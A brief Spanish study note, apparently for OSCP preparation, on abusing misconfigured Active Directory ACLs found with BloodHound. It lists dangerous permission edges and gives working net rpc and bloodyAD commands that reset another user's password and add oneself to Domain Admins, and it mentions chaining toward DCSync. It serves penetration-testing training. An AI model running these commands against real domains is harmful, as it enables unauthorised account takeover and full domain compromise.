# ACL abuses > Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory. ## Las aristas peligrosas ``` GenericAll → control total sobre el objeto WriteDACL → te das a ti mismo cualquier permiso AddMember → te metes en un grupo (ej. Domain Admins) ForceChangePassword → cambias la pass de otro usuario sin saber la actual GenericWrite → modificar atributos (ej. añadir SPN → Kerberoasting dirigido) ``` ## Explotación típica (con bloodyAD / PowerView / impacket) ```bash # ForceChangePassword: net rpc password "victima" "NuevaPass123!" -U "dominio/yo%mipass" -S DC_IP # AddMember a un grupo: bloodyAD -d corp.local -u yo -p pass --host DC add groupMember "Domain Admins" yo ``` ## Encadenado Una arista lleva a otra → BloodHound calcula el **camino** hasta Domain Admins → puede acabar en DCSync. Relacionado: BloodHound · LAPS · OSCP MOC